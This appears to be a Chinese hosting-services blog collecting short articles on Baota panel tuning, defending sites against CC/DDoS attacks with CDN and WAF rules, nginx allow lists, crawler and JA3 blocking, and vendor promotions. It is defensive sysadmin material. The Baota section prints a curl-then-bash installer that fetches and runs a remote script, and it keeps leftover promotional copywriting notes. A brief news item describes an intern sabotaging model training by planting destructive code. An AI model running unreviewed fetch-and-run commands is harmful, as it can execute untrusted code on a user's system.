对于这个问题主机吧上周也遇到过类似的问题,查了挺久,一开始以为是CC攻击,还把网站设置全部缓存,结果查看了下CDN,消耗流量与请求量并没有异常,说明并不是攻击问题。 最后我们从服务器下手,以为是服务器中毒了,然后我们发现来自网站的数据库请求并发非常高,连接中的经常达200+,也就是这导致了服务器一但有了稍微高一点的访问量,就会出现CPU100%的情况。 找到原因后我们要怎么解决呢? 当然是合理分配资源,以主机吧用的宝塔面板为例,进入软件商店,找到mysql数据库,进入设置 找到性能调整,根据自己的服务器配置选择相应的优化方案,比如我的是4G内存的,那么就选2-4G,可以选小的方案,但不要选大的,因为这样只会让数据库保持连接超过你服务器的承受范围,影响服务器性能。 选择完保存后,我们再进入PHP设置,性能调整,网站如果每天只有2000+IP访问量的,建议选50或者100并发,这里写的并发是让你的服务器一但达到这么多并发了,系统会自动清除掉进程,达到服务器优化目的,所以不是设置越大越好,因为一但你并发达56百的时候,系统却没有清除进程,一般服务器是受不住的,会出现卡慢设置打不开的状态,所以选择合适自己服务器配置的优化状态很重要,主机吧就是选100并发的。 主机吧设置完后,通过一周的观察没有再出现卡慢的情况了,CPU也不会跳100%了。 以上都是在非被攻击的情况下设置有效,如果你是被人CC攻击的,那么还是给自己弄个高防CDN吧,这里主机吧推荐百度云加速,拦截CC攻击效果棒棒哒! #### 宝塔面板防火墙拦截百度云加速502怎么办? 经常有站长向主机吧反馈网站访问出现502的问题,主机吧了解后,发现大多都是因为宝塔防火墙拦截了。但是他们已经卸载了,还是出现502怎么回事呢?其实是因为宝塔的那个防火墙其它卸载了之前拉黑的IP还是在服务器的黑名单中,比如主机吧这位客户,防火墙已经卸载了,服务器也重启了,但是依然拦截CDN的IP,CDN节点进入服务器后都被跳转到502页面。   想要彻底解决掉CDN节点被拦截问题,只要把web引擎给卸载后,重新安装即可。或者切换别的引擎,比如主机吧这位客户本来是用Nginx的,这边给他切换成apache就好了。     #### 宝塔面板:值得推荐的服务器建站环境集成软件 宝塔建站软件是目前国内少有的傻瓜似建站平台,支持linux和windows系统环境,并支持网页管理方式,操作相当方面。 Linux版支持一键创建网站、FTP、数据库、SSL;安全管理,计划任务,文件管理,PHP多版本共存及切换;自带LNMP与LAMP Windows版支持2003(x86)/2008(x64)/2012/2016系统,支持Web端与软件端同步管理,一键创建网站、FTP、数据库;安全管理,文件管理,PHP多版本共存及切换;ASP+ASPX+PHP+MYSQL+MSSQL05/08+mariaDB+FTP  同时支持后台一键安装各类环境 宝塔的主要特色在于其操作相当简单,即使是一个不懂服务器的人来弄也是可以很简单的创建网站。其是目前少有的支持一键免费安装ssl证书的建站软件。同时支持在winodws系统一键安装Apache、nginx WEB环境的平台。更要紧的是宝塔目前是国内更新就频繁的建站平台,几乎每月都有更新,非常恐怖的更新能力。 总之宝塔是小白建站为了少事的站长不可多得的建站软件,赶紧去试试吧。 官方地址:http://www.bt.cn/ #### 宝塔面板:免费简单高效的服务器运维管理工具 宝塔面板(BT Panel) 是一款专为中文用户设计的服务器运维管理面板,通过可视化操作大幅降低服务器管理门槛,让建站、部署应用、系统监控等复杂任务变得简单高效。无论是个人开发者还是企业运维团队,均可快速上手。 核心功能亮点 1️⃣ 一键式操作,极简部署 快速建站:支持PHP、Java、Python等环境一键配置,轻松搭建WordPress、Discuz等主流应用。 软件管理:Nginx/Apache、MySQL、FTP等常用服务即点即装,告别命令行操作。 SSL证书:自动申请Let’s Encrypt证书,轻松实现HTTPS加密。 2️⃣ 全方位服务器监控 实时查看CPU、内存、磁盘使用率及网络流量。 日志自动分析,精准定位异常访问与安全威胁。 资源异常自动告警(专业版支持微信/邮件通知)。 3️⃣ 高效文件管理 可视化文件编辑器,支持在线压缩/解压、权限修改。 拖拽上传、远程下载,管理网站资源更便捷。 4️⃣ 安全加固体系 内置防火墙功能,可自定义端口/IP拦截规则。 定期漏洞扫描,提供木马查杀与网站防篡改方案。 SSH登录IP白名单设置,杜绝非法入侵。 版本选择建议 免费版:满足基础建站与运维需求,适合个人开发者及小型项目。 专业版(付费):解锁网站监控报表、网站防篡改、异常自动修复等高级功能,推荐企业用户使用。 跨平台支持 操作系统:兼容CentOS、Ubuntu、Debian、Windows Server等主流系统 环境要求:最低1核CPU/1GB内存/20GB硬盘(建议2核4GB以上配置) 为什么选择宝塔面板? ✅ 零门槛操作:图形化界面替代复杂命令,新手5分钟上手✅ 国产化适配:专为国内服务器优化,支持阿里云/腾讯云等主流云平台✅ 持续更新:开发团队积极响应社区需求,每月功能迭代✅ 丰富教程:官方提供完善的文档与视频指南,社群互助活跃 快速安装指南 通过SSH连接服务器,输入对应系统的安装命令:Linux版: curl -sSO http://download.bt.cn/install/install_panel.sh && bash install_panel.sh Windows版:访问官网下载安装包 安装完成后,按提示访问面板地址,完成初始化设置。 立即体验点击下载宝塔面板让服务器管理回归简单,释放您的运维生产力! 用户评价精选 "从手动配置到宝塔面板,部署时间减少80%,运维效率飞跃提升!" —— 某电商平台运维负责人"即使是零基础的小白,也能轻松搭建专业级网站环境。" —— 个人开发者王先生 常见问题Q:是否需要付费才能使用基础功能?A:免费版已包含建站、监控等核心功能,满足日常需求。 Q:支持Docker管理吗?A:专业版提供可视化Docker管理模块,免费版可通过插件扩展。 (注:建议在页面添加操作系统选择按钮、最新版本号及更新日期) 此文案兼顾技术点与用户体验,突出易用性和功能性,适合引导下载决策。可根据实际需求补充截图、性能对比图表等视觉元素增强说服力。 #### 实例用百度云加速防御3395万次CC攻击 百度云加速是目前国内最具性价比的高防CDN,价格便宜,而且效果好,主机吧曾经百度云加速给很多站长防御过CC攻击,效果都非常好。 今天主机吧又接了一位网站被DDOS CC攻击的客户: DDoS攻击已停止。开始时问: 2023-06-14 12:14:00(GMT+08:00),结束时间:2023-06-14 12:36:00(GMT+08:00),峰值: 41048Mbps,类型:UDPFLOOD,累积清洗:277222MB 本着为客户省钱的原则,我们推荐使用百度云加速商务版。 在这里需要注意的是:在接入百度云加速之前先给服务器更换一个新的IP,然后用百度云加速CDN隐藏起来。 成功接入百度云加速后,稳定运行了一段时间,然后突然的访问502 检查服务器后,发现服务器CPU 内存占满,全部100%,说明对方在接入百度云加速后,不再使用DDOS攻击,改而使用CC攻击。 我进入百度云加速,安全功能-ADS-CC防御功能,开启强力防御模式。 然后等10分钟左右,服务器自动恢复。 总拦截3395万次CC攻击,拦截峰值2193万次。 已成功拦截,网站正常访问,不受影响。 百度云加速防御CC攻击确实厉害,有需要的同学可以咨询主机吧购买,包指导防御。 #### 实战使用香港服务器网站如何防御DDoS攻击 今天一客户的香港服务器被DDOS攻击了,找到主机吧让帮忙防御。所以今天我们就来实操一下,如何给香港服务器防御的。 首先,我们开通百度云加速专业海外版 然后点继续接入,下一步 得到验证记录 进入域名解析相应的记录 联系服务器商更换新IP,百度云加速添加子域名 得到别名后,进入域名解析记录应的记录   然后等生效即可完成防御,简单方便。   #### 实战利用京东云星盾安全加速 SCDN拦截超强CC攻击 今天,有位站长联系上主机吧,先是购买了百度云加速专业版进行了防御,没想居然超量了,攻击达10万CC攻击每秒,这超过了百度云加速普通套餐的防御量了。 考虑到经济性,主机吧给客户试用了京东云星盾安全加速 SCDN,商业版套餐只需1520元。 SMB 商业版 适合接入1个网站主域名 安全加速流量:5TB 应用攻击防护:支持 WAF自定义规则:20条 DDoS攻击防护:20Gbps CC攻击防御:支持 免费通用证书 自定义上传证书:1 专用证书:2 静态内容缓存 最大可缓存文件:500MB 快速清除缓存 自定义清除缓存 页面规则:20 图片、代码优化 BOT机器人管理(Beta) HTTP2 性价比非常高! 简单接入后,我们直接开启CC防护: 1.进入星盾后台-安全规则-托管规则  开启Web应用程序防火墙 2.进入安全规则-防火墙设置  开启BOT识别模式 挑战周期:15分钟 安全级别:选遭受攻击(这个很重要) 浏览器完整性检查开启 以上操作即可完成CC攻击拦截,然后我们进入数据分析-日志分析功能 点击进入安全事件,我们发现黑客攻击了一个不存在的路径,导致服务器疯狂的反馈404,从而使得服务器CPU占满了。 针对这个请求,我们进入安全规则-防火墙规则,创建一条针对这个攻击的拦截。 规则描述:防火墙 字段:URI 运算符:等于 值:/admin_xqhkj/login.aspx(对方攻击的路径) 操作:阻止 确认后我们再访问这个路径,直接显示被拒绝访问。 再查看安全事件,已经拦截生效。 网站恢复正常访问,防御CC攻击成功!有需要防御的同学可以联系主机吧购买。 #### 实战如何利用百度云加速给网站加速 百度云加速一直是比较受欢迎的CDN产品,不仅可以对网站进行攻击防护,也可以加速。很多站长都说百度云加速并不快,其实原因在于并没有设置好,没有设置相应的加速设置,网站访问肯定不快。今天主机吧来实战一位客户的网站,给大家介绍下如何使用百度云加速,使网站访问飞起。 要对网站进行加速,首先我们得看下自己的网站属于什么类型,如果你是纯静态的,哪怕是伪静态的,而且没有会员登陆这些动态信息的,那么设置很简单了。 比如我们这边为客户: 除了首页是采用php首页外,其它内页等都是采用伪静态的方式,也就是 html的,而且并没有会员登陆这些动态功能。那我们接入百度云加速后,进入规则自定义功能 添加一条规则为www.gendiao2007.com/*的设置 具体设置为: 跳转到:默认关闭 缓存粒度设置:开启所有都缓存(这个很重要,网站加速的快慢决大多数取决于这个功能) 节点缓存有效期:设置4 8小时都可以,这个取决于你网站的更新频率,如果你一天就更新一次,那么设置一天也可以。更新频率越小,对网站源服务器的压力越小。 浏览器缓存有效期:设置2小时即可 永久在线:开启 图片延迟加载:这个功能对图片多的网站很重要,图片多影响打开速度,开启这个功能可以延迟图片打开,从而加速网站打开速度。 加速:JS文件这个最好是不要开启,如果你是纯移动站的话 开启没什么问题,如果是PC站的话 有可能会有些显示错误 安全通用设置:开启 这个可以拦截一些安全上的攻击 CC防护:如果网站有大量CC攻击的话 开启高 或者强力防护 如果没有攻击就开启中就行了 浏览器检查: 如果网站有攻击就开启,没攻击就默认关闭好了。   好了设置完成后我们再到17测测下速度看下是不是快很多。 没开启云加速前 开启云加速后 这样一测下了,效果相当明显哦,开启云加速后客户网站访问速度飞启。 这样还没完哦,因为我们以上对网站所有页面都进行了缓存,导致网站后台登陆失效了,我们需要对后台地址进行一个单独页面不缓存设置。 客户网站后台地址为www.gendiao2007.com/yunadmin/,   我们添加一个规则为www.gendiao2007.com/yunadmin/* 然后设置不缓存即可,如下图: 这样我们的后台登陆就正常了。百度云加速的规则自定义功能是CDN的神器来的,可以根据不同的网站地址进行不同的缓存设置,很好用,大家可以根据自己的网站进行设置哦,赶紧去试试吧。 #### 实战如何把域名备案转入百度云 之前博客的备案是在西部数码备案的,西部数码的空间还不错,只是听说用百度云的产品对网站收录好,正好百度云虚拟主机也打折,所以买了一个试试,顺便一起把备案转入百度云,为什么要转入备案呢?因为如果不转入备案的话,备案很容易掉,所以为了安全起见还是转入备案放心。 今天我们来试试如何转入备案吧。 首先进入百度开放云,虚拟主机BCH管理,点备案 选择备案域名,确定   填写企业备案资料 输入备案密码,如果不清楚的,可以到工信部网站找回 然后一直点下一步,输入网站负责人联系方式 上传营业执照与身份证     上传完资料,点下一步,确认更改备案接入,提交等待百度初审。 #### 实战如何解决IP绕过百度云防护web应用防火墙拦截问题 最近,主机帮发现网站服务器经常CPU占满,带宽被占满,于是观察了下网站请求日志,发现很多请求并没有经过百度云防护防火墙请求进来的,因为主机帮网站的请求日志并没有开启CDN真实用户IP识别,所以如果是通过百度云防火墙进来的话,那么显示的IP应该是百度的回源IP: 但,现在除了百度回源IP外,还有大量的非百度回源IP请求进来,说明这些非百度IP的请求是直接通过源服务器IP请求进来的。 为什么会出现这种情况,主机帮也不是很清楚,可能是对方通过扫描全网IP,进来的,也可能是做了搜索引擎回源进来的,也可能是同台服务器的网站直接解析暴露的,不过这都不重要,今天我们来学习下这种直接绕过百度云防护WAF拦截的IP,要如何解决。 方法1:服务器安全组/防火墙拦截 这种是通过查看网站日志,把不是CDN回源的请求IP拦截,比如66.249.79.5、66.249.79.6就是日志里典型的扫描IP,通过设置端口规则拦截,如下图: 不过,这种方法有个缺点,如果绕过防火墙的IP过多设置起来比较麻,或者对方更换IP,就需要重新设置禁止。 2 服务器禁止对外开放 只放开防火墙回源IP请求 通过设置服务器安全组或者防火墙把80和443端口禁止对外访问,然后添加百度云防护回源IP段访问白名单,这样你的网站请求只能通过百度云防护访问进来。 缺点是,如果你的服务器里有别的域名,而且这个域名并没有接入百度云防护,那么会影响这个网站的正常访问。 3 在nginx网站配置文件里添加只允许百度云防护回源IP段访问 这个方法完美解决了上面的缺点,只允许百度云防护回源IP段访问,其它IP段访问一律403 如下图: 在网站配置里添加添加: ######################################################################### # 只允许百度云防护回源IP段,其它IP一律403 ######################################################################### # IPV4 单IP /32 allow 114.111.24.152/32; allow 106.13.248.83/32; allow 114.111.24.217/32; allow 114.111.24.136/32; allow 106.13.244.72/32; allow 106.13.248.135/32; allow 114.111.24.230/32; allow 106.13.248.235/32; allow 106.13.244.114/32; allow 106.13.244.161/32; # IPV4 段 allow 114.111.20.32/27; allow 111.63.71.192/26; allow 150.138.245.192/26; allow 119.188.178.192/26; allow 119.188.179.192/26; # 拒绝其它所有 deny all; ######################################################################### 保存后,重启nginx服务,即可生效,此时通源服务器IP访问网站的,都会显示403 需要注意的事,此使用此方法一定要关掉CDNcdn来源IP解析(识别访客真实用户IP),因为会影响nginx拦截。 4.修改网站访问端口 通过把服务器网站80端口和443端口改成别的端口,然后在百度云防护接入配置里修改对应的回源端口即可。 这种方法的好处是,有效隐藏了源服务器网站的对外端口,使源服务器更安全。 好了,以上就是一些解决绕过百度云防护web应用防火墙WAF的访问网站的一些措施,希望可以帮到大家,如果有不懂的,可以留言咨询。 #### 实战如何设置百度云加速CDN给动态网站加速 很多站长都会接入百度云加速,但很少人会根据自己的网站设置加速规则,因为往往使得使用百度云加速后并没有起到加速作用。 今天主机吧以客户的一个动态网站(www.haoshanpu.com)为例,给大家讲解下如何进行加速设置: 1.首先我们要分析网站打开的主要资源,方法是:使用火狐浏览器,打开网站,然后按F12,点网络,刷新分析 得出的分析表明这网站的CSS、JS以及图片文件较大,影响了网站打开速度。   2.进入云加速设置,进入云加速域名管理,加速功能,勾选CSS、JS压缩,图片无损压缩 3.在控制台,域名报表下拉、规则自定义,设置缓存规则 因为网站图片链接为 www.haoshanpu.com//uploadfiles/XXX,所以我们自义规则为www.haoshanpu.com//uploadfiles/* 设置如下: 网址:www.haoshanpu.com//uploadfiles/* 缓存粒度设置:所有都缓存 节点有效时间:4小时 浏览器有效时间:2小时 永久在线:开启 图片加载延迟:关闭(主机吧认为这功能影响打开速度) 参数排序:开启 加速:关闭 安全通用设置:开启 CC防护:中 浏览器检测:关闭 如果网站其它静态资源太多的也可以同增增加一条 添加完后,等30分钟后我们测试发现首页虽然打开比之前快很多,但是还是有些慢,而内页则快很多,研究后我们发现原来客户程序首字节过慢导致的,什么是首字节可看相关介绍 这里就不多说了,我需要做的是把首页缓存化,从而减少每次请求首页都必须请求源站的尴尬。添加一条首页缓存,具体如下:   一切完成后,进入云加速,加速功能,CDN,刷新全站缓存,刷新后等30分钟左右再访问 使用17测,测试查看,速度飞起! 好了,以上就是主机吧对动态网站使用百度云加速进入设置的一些见解,希望可以帮助大家,有什么问题可以在下方留言主机吧,我们会及时回复大家。 #### 实战服务器空间搬迁discuz论坛程序数据库备份与恢复 备份和恢复Discuz!站点数据库的方法有很多,每种方法都思路都会不同。有用帝国备份的,有用直接phpmysqladmin导出的,Discuz!为方便用户备份和恢复数据库,已在后台内置了此功能,易于站长操作。今天在这分享一下Discuz! 论坛后台数据库的备份和恢复方法,以及备份数据库和恢复数据库要注意的一些细节问题。以下方法只适用于搬迁云服务器。 一、利用Discuz!后台备份数据库 1、为备份数据完整无误,备份数据前请站长先关闭站点; 2、利用站长权限登录后台——》站长——》数据库——》备份,有两个基本的数据备份类型:“Discuz! 和 UCenter 数据” 和 “自定义备份”; 1)、选择“Discuz! 和 UCenter 数据”,会备份你Discuz!数据库的所有数据表文件;(包括插件等生成的数据表)备完数据库后我们打包完整discuz网站源码,就可以开始导入恢复至新空间上了。1.首先我们到新服务器空间上创建与旧服务器空间相同的数据库帐户与密码。2.然后上传完整备份的Discuz!源码至新空间根目录上。3.上传restore.php到新空间/data/目录里,这个文件在全新下载的discuz程序utility文件夹里有提供。然后我们把/data/restore.lock里的文件删了,再访问地址:你的域名/data/restore.php点击导入最新备份,等待导致完成 导入完成后我们再把/data/restore.php删了,一切搞定! 然后登陆网站后台更新缓存即可。注意:新空间的数据库帐户密码必须和旧空间的一样,否则导入不成功的。 #### 实战解决七色光联盟CC攻击过程 之前有写过一篇如何防御七色光联盟的攻击的文章,那篇文章写得比较笼统,刚好今天一位客户就被七色光联盟攻击了,我们就来详细如何操作防御的。 七色光联盟这个组织大家都知道,一个非法境外C的组织,往往受攻击都是因为他们组织想在你的网站上放BC链接。 而境外黑客组织有个特点,攻击的肉鸡绝大多数都是海外的IP,所以我们利用域名DNS屏蔽掉海外IP访问是可以让攻击流量小很多的。详细参考《如何屏蔽IP海外IP访问》 屏蔽掉海外IP访问还不够,因为他们国内的IP也一样可以对你造成威胁,所以我们要用到百度云加速,这里推荐购买百度云加速商务版及以上版本,专业版和免费版就别想了,基本都是会被攻击起超限的. 成功接入百度云加速后,进入安全功能-WAF: 开启 Web应用防火墙 安全验证有效期:30分钟 浏览器检查:开启 进入安全功能-ADS CC防护-强力防护模式(这个很重要,可以拦截掉99.9%的CC攻击) 停用海外节点- 开启 超级清洗中心-开启 海外IP防护-开启 源站保护:100秒 进入CDN加速: 缓存粒度设置:简单 浏览器缓存有效期:4小时 智能压缩:CSS、JS、HTML 最大上传文件大小:500M 图片自动压缩:有损压缩 IPV6:关闭(这个记得一定要关闭) 设置完后,我们就坐等15分钟防御生效即可,如果服务器IP之前已经暴露了的,建议更换一个新的源服务器IP,否则黑客及有可能利用DDOS攻击使服务器防御失效。 15分钟钟后,客户网站访问正常,查看百度云加速报表拦截了4亿多CC攻击,七色光联盟的攻击是非常大的。 1分钟攻击峰值达2亿次,由于屏蔽的海外IP访问,攻击进来的地区都是国内IP,可见屏蔽掉海外IP访问是一件非常正确的事情,否则攻击还会更大。 目前客户网站一切运行正常,防御很成功! #### 实捶!字节跳动AI大模型被实习生投毒导致巨大损失! 前几天多个微信群流传一则消息:“某头部大厂的大模型训练被实习生入侵,注入了破坏代码,导致其训练成果不可靠,可能需要重新训练。据称遭到入侵的代码注入了 8000 多张卡,带来的损失可能超过千万美元。” 据知情人士透露,该头部大厂为字节跳动。此事发生在今年 6 月,起因是某高校的博士在字节跳动商业化技术团队实习,因对团队资源分配不满,使用攻击代码破坏团队的模型训练任务。 传闻显示,该实习生利用了 HF的漏洞,在公司的共享模型里写入破坏代码,导致模型的训练效果忽高忽低,无法产生预期的训练效果,而且 AML 团队无法核查原因。但传闻曝出之后,该实习生还在某微信群里辟谣称,自己发完论文后就从字节跳动离职,这个当口有另一个人钻漏洞改模型代码,把锅扣到自己头上。 字节跳动于今日10 月 19 日发布《关于“实习生破坏大模型训练”的事实澄清》:近期有媒体称“字节跳动大模型训练被实习生攻击”,经公司内部核实,确有商业化技术团队实习生发生严重违纪行为,该实习生已被辞退。 特说明如下: 涉事实习生恶意干扰商业化技术团队研究项目的模型训练任务,但并不影响商业化的正式项目及线上业务,也不涉及字节跳动大模型等其他业务。 网传“涉及 8000 多卡、损失上千万美元”严重夸大。 经核实,涉事人一直在商业化技术团队实习,并没有 AI Lab 实习经历。其社交媒体个人简介及部分媒体报道有误。从公告获悉,该实习生已在 8 月被字节跳动辞退。字节跳动称将其行为同步给行业联盟和所在学校,交由校方处理。 #### 实操使用百度云防护拦截网页爬虫抓取 最近,有位客户联系上主机帮,咨询网站服务器CPU经常满了需要怎么处理? 主机帮首先让客户提供下近期的网站日志给我,这边给他分析情况。 我们打开kimi AI工具,把客户发来的网站日志上传至AI分析。 然后咨询:帮分析下哪个时间段访问高 还有最高的是哪个UA 得出答案如下图: 可以看出,访问最高的除了百度和谷歌的UA外,其它的都是一些恶意的网页爬虫,这些爬虫的访问并发非常高,会使服务器资源占满,为了不影响服务器访问,我们通过百度云防护创建Web防护规则,把以上的爬虫拦截,如下图: 其中主机邦把几个典型的恶意爬虫UA拦截处理,AhrefsBot、Barkrowler、SemrushBot、python四个包含的拦截。 确认拦截后,网站果然恢复了,目前网站不仅要面临黑客的攻击,还要面临大量的爬虫抓取,这些爬虫非常消耗服务器,所以我们要把那些没有任何好处的爬虫拦截了,利用百度云防护WEB应用防火墙不仅可以拦截黑客入侵,还可以防御DDOS、CC攻击,还支持自定义访问策略,可针对IP、UA、URI等字段拦截策略,同时企业版还支持bot AI防护,有效解决各种网站安全问题,有需要的同学可以咨询下。 #### 实操网站该如何精准解决web应用防火墙WAF误拦截问题 最近,有位客户反馈网站接入百度云防护后,出现网站验证码无法显示的情况。 经主机帮推断应该是验证码触发了Web应用防火墙的基础安全规则拦截,最简单的解决办法是直接关掉基础规则模块,但这样会影响其它安全防护,因此,今天我们来操作如何单独解决误拦截问题。 一.WAF基础安全规则去掉该安全规则 1.访问ip138.com 查看自己网络的本地IP并复制下来,然后进入百度云防护后台-攻击详情-Web基础防护-选择IP搜索,搜索你的IP,查看拦截记录。注意,这里的IP一定要是误拦截的IP。 然后我们点击详情,查看拦截的规则 ID,保存复制下来 2.进入web防护-基础防护-编辑之前规则-选自定义规则组-添加新规则组 规则组名称:随便写一个 搜索之前复制的规则 ID,然后删掉,确定。 回到规则模板,选择刚才确定保存的规则组名称,保存即可。 二、把拦截链接加白 第二种方法就是把容易被拦截的请求链接加入白名单,不需要安全检测。 1.访问ip138.com 查看自己网络的本地IP并复制下来,然后进入百度云防护后台-攻击详情-Web基础防护-选择IP搜索,搜索你的IP,查看拦截记录。注意,这里的IP一定要是误拦截的IP。 然后我们点击详情,查看拦截的攻击路径。复制保存下来。 2.进入安全防护-白名单规则-添加规则 规则名称:链接白名单 (自己随意取一个就行) 匹配条件:URI Path 等于 输入之前复制的攻击路径链接 跳过检测模块:基础防护规则 (也可以全选) 然后选择站点,保存即可。 好了,以上就是两个比较简单的精准解决防火墙误拦截的方法,希望可以帮到大家。 #### 实操解决客户网站被盗刷CDN流量问题 最近有位客户的网站从上个月开始,百度云防护的套餐流量消耗大增,导致网站流量一度不够用,于是找上主机帮帮忙看下。 主机帮通过百度云防护投递日志后,等个两个小时,查看后发现该网站被一个JA3值为:bd06f4341a65d44a68bd2cef7cbedc6 的客户端频繁访问,而且访问的IP、URI都不同: 因此,大概率可以判断这是一个同一台服务器使用盗刷软件对网站进行刷流量的行为。 那要怎么拦截呢? 其实很简单,因为对方不管换了多少IP或者访问地址,其访问网站的JA3值都是一样的,因此我们利用百度云防护的JA3拦截功能进行拦截就行了。 进入web防护-自定义规则-添加以下规则: 匹配条件:JA3 等于多值之一 输入之前在日志看到的黑客JA3值:bd06f4341a65d44a68bd2cef7cbedc6 处置动作:拦截并追加封禁 保存后,我们进入攻击日志-自定义规则查看拦截详情: 该JA3下总共有两个IP段的IP访问,分别为180.97.250.*和58.218.211.* 使用IP138.com查询这些IP后,发现都是来自于江苏某数据中心的IP。 更加实锤了这些是盗刷软件的IP。 #### 实测腾讯云轻量应用云服务器锐驰型上传速度只有5M/秒 最近两年阿里云和腾讯云都上线了一款型号为锐驰型的轻量应用云服务器。 其特点就是峰值带宽高达200M,主机帮也买了一个试试。 发现还可以,就是有时候速度很慢,主机帮估计是因为锐驰型的带宽是共享的,很多人在用,遇到高峰值的时候,大家都一起慢…… 不过,有一点锐驰型的上传速度确实快,主机吧测试,最高上传速度高达5M/秒,大家别以为这速度慢,这速度比一些几十M独享带宽的服务器速度还好,主机吧8G多的压缩包,只需要1个小时不到就上传完了。 整体使用下来,锐驰型适合拿来做下载类的网站,配合上CDN,速度应该飞起。 对于要求稳定性的,不建议使用锐驰型,因为速度时快时慢,相当于几十个人同时住在一栋别墅里,体验不好。我估计很多同学买锐驰型是拿来做CDN,下载有大带宽需求的,虽然速率不稳定,但是下载速度没得说。 不过锐驰型还有个风险,如果网络下,有人长期占用带宽的话,那就惨了,可能使网络一直卡,不知道腾讯云有没有这方面的限制。 #### 实锤!百度站长资源平台大量清退低质作弊网站 近期,有大量站长反馈自己的域名无缘无故被百度站长平台清退,原因提示低质网站。 主机吧看了下,有80%以上的网站都中招。(主机吧的网站没有) 一些乐观的站长认为是百度站长平台的bug。 不过很快破案了,就是低质量网站违规被清退的,百度已经发公告了。 为保护站点提升优质资源利用率,维护良性健康的搜索生态,近期搜索资源平台针对风险资源站点开展了验证关系清退,例如账号未实名认证、站点低质作弊等。 (1)如您尚未完成百度账号实名认证,请尽快通过百度App【我的】-【设置】-【账号管理】-【身份认证】完成实名认证,避免账号下站点受到影响; (2)如站点已被清退,您可以参考《百度搜索违规低质页面问题说明》自查整改后重新提交验证。如整改后仍无法验证,或自查未发现违规问题,可通过资源平台验证关系清退反馈进行反馈,我们将尽快核实处理。 此后,搜索资源平台也将持续监控、清理低质站点,请您定期自查,优化违规问题,规避风险“雷区”。 百度搜索致力于与广大开发者共同努力,为亿万搜索用户提供优质可信的内容、安全便捷的搜索体验。感谢您的关注与支持! 源文:https://ziyuan.baidu.com/college/articleinfo/?id=3529 所以,提高网站内容质量才能自保,咱不求网站上进,只求网站别被百度抛弃就行,毕竟现在互联网流量相当昂贵,免费流量的时代过去了。 #### 客户使用京东云SCDN被刷欠费高达5万+ 今天,早些年一直听说京东坑,今天有位站长联系上主机帮反馈防御失效了,导致网站打开卡慢。 主机帮一查,发现域名回源了。 通过咨询京东回复发现是帐户欠费导致业务回源了,然后直接欠费5万多。 是什么业务导致欠费的呢,咨询京东后发现居然是京东云的SCDN包月套餐居然还有后付费项目。 当时带宽峰值超量后,按照带宽峰值方式计费,而我客户这一天月每天峰值都是超的,被人刷了每天峰值都高达800M左右,按上面的计费的话,一天得好几千,这就离谱了。 目前跟京东那边协商处理方案,这个计费方式实在太坑,后续有处理方案,但目前这欠费5万多还在扯皮中…… 这里也给使用后计费的同学一个警示,一定要随时关注好流量使用情况,能不用后计费的业务就不要用,因为目前CDN流量很容易被人刷出大量流量,这些流量基本是很难识别出是否正常流量的。一但遭到恶意刷流量,后续收费是非常昂贵的。 主机帮推荐使用那种套餐模式的,没有后付费的套餐,比如百度云防护套餐,没有后付费的项目,即使套餐流量用完了,也不会欠费,顶多是业务自动停止而以,这像京东,直接被干到欠了几万块,简直不要太离谱。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### 客户分享:网站从遭遇CC攻击到解决的亲身经历 上个月,我们的网站遭到了一次CC攻击。虽然我对CC的防御还是比较了解,但是真正遇到时依然打了我个措手不及。CC防御是一件比较繁琐的事,面对各种不同类型的攻击,防御方式也不尽相同。当面临攻击来的太快量也很大这种情况,在自身环境下做调整已经无法抵抗攻击。为了缓解网站压力,在尝试了其他方式后最终还是选择切换到了百度云加速高防CDN上。过程中也遇到了很多问题,但是为以后的DDoS防御留下的很多经验。所以写下这篇文章,与大家分享。 CC攻击是目前应用层攻击的主要手段之一,只需要借助代理服务器生成指向目标系统的合法请求,就能实现伪装和DDoS。 其实我们都有这样的体验,访问一个静态页面,即使人多也不需要太长时间,但如果在高峰期访问论坛、贴吧等,那就很慢了,因为服务器系统需要到数据库中判断访问者是否有读帖、发言等权限。访问的人越多,论坛的页面越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就相当的大。CC攻击就充分利用了这个特点,模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面,造成服务器资源的浪费。 当时我们发现服务器的CPU长时间处于100%的状态,永远都有处理不完的请求,网络拥塞,正常访问被中止,PHP直接卡死了,但是由于CC攻击技术性含量高,我们又无法见到真实源IP,也见不到特别大的异常流量,但服务器就是无法进行正常连接。最后才确定,这些其实都是CC攻击的典型特征。 CC攻击之所以会选择代理服务器是因为代理可以有效地隐藏自己的身份,也可以绕开防火墙,因为基本上所有的防火墙都会检测并发的TCP/IP连接数目,超过一定数目一定频率就会被认为是Connection-Flood。当然也可以使用肉鸡来发动CC攻击,攻击者使用CC攻击软件控制大量肉鸡发动攻击,肉鸡可以模拟正常用户访问网站的请求伪造成合法数据包,相比前者来说更难防御。 CC攻击是针对Web服务在第七层协议发起的攻击,在越上层协议上发动DDoS攻击越难以防御,上层协议与业务关联愈加紧密,防御系统面临的情况也会更复杂。比如CC攻击中最重要的方式之一HTTP Flood,不仅会直接导致被攻击的Web前端响应缓慢,对承载的业务造成致命的影响,还可能会引起连锁反应,间接攻击到后端的Java等业务层逻辑以及更后端的数据库服务。真的非常的扎心!由于CC攻击成本低、威力大,很难防御,80%的DDoS攻击都是CC攻击。而攻击造成的后果就是:带宽资源严重被消耗,网站瘫痪;CPU、内存利用率飙升,主机瘫痪;瞬间快速的打击,使我们根本无法快速响应。 那我们是如何一步一步解决的?其实在遇到攻击时,我们有仔细考虑过很多方案,是选择高防机房、机房流量清洗还是云防御? 遭到攻击的第一刻,我们首先想到的是更换服务器的方法。网上也有很多过来人推荐这种办法,但问题是,CC攻击主要是从域名攻击而来,你不可能因为对方攻击你域名就换个域名吧,一开始我们找了网上一些小服务商的高防服务器转移过去,号称无视CC攻击…但结果效果并不理想,首先对方防火墙误杀率非常高,有些正常用户都被拦截了,其次是他们宽带普遍不高,被攻击后,虽然可以访问,但是速度非常慢。无奈之下我们只好往大品牌看,在选择高防产品时我们对阿里云、腾讯云和知道创宇、百度云加速几家进行了对比。这几家实力都很雄厚,价格阿里云>腾讯云>知道创宇>百度云加速,但是除了百度云加速外,前面三家真的贵,怎么贵呢?相当于百度云加速价格的十倍以上还高,我们网站也没多少盈利,如果全部花在防御上的话,那就等于白干了,而且听说百度云加速是与国外著名的高防CDN 